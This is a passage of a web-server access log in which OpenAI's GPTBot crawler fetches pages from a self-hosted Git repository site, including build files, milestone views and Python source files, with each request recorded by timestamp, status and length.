+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12995] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12994] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html" [Client 74.7.227.38] [Length 22561] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 44639] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:16:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:16:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:16:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:16:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:16:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7653] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" -[17/Feb/2026:16:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:16:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7656] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" -[17/Feb/2026:16:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8496] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:16:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8497] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=closestduedate&state=closed" -[17/Feb/2026:16:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8499] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=furthestduedate&state=closed" -[17/Feb/2026:16:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8495] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:16:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8502] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:16:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8501] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=closed" -[17/Feb/2026:16:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" -[17/Feb/2026:16:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13021] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" -[17/Feb/2026:16:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16166] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" -[17/Feb/2026:16:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 12989] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" -[17/Feb/2026:16:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" -[17/Feb/2026:16:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14296] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11886] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13019] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" -[17/Feb/2026:16:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13019] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" -[17/Feb/2026:16:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13018] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" -[17/Feb/2026:16:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" -[17/Feb/2026:16:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14291] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11919] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16170] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:09:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/services/geminiService.ts" -[17/Feb/2026:16:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/services/geminiService.ts" -[17/Feb/2026:16:09:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:16:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/services/geminiService.ts" -[17/Feb/2026:16:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23798] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23823] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23821] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7801] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" -[17/Feb/2026:16:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 11211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 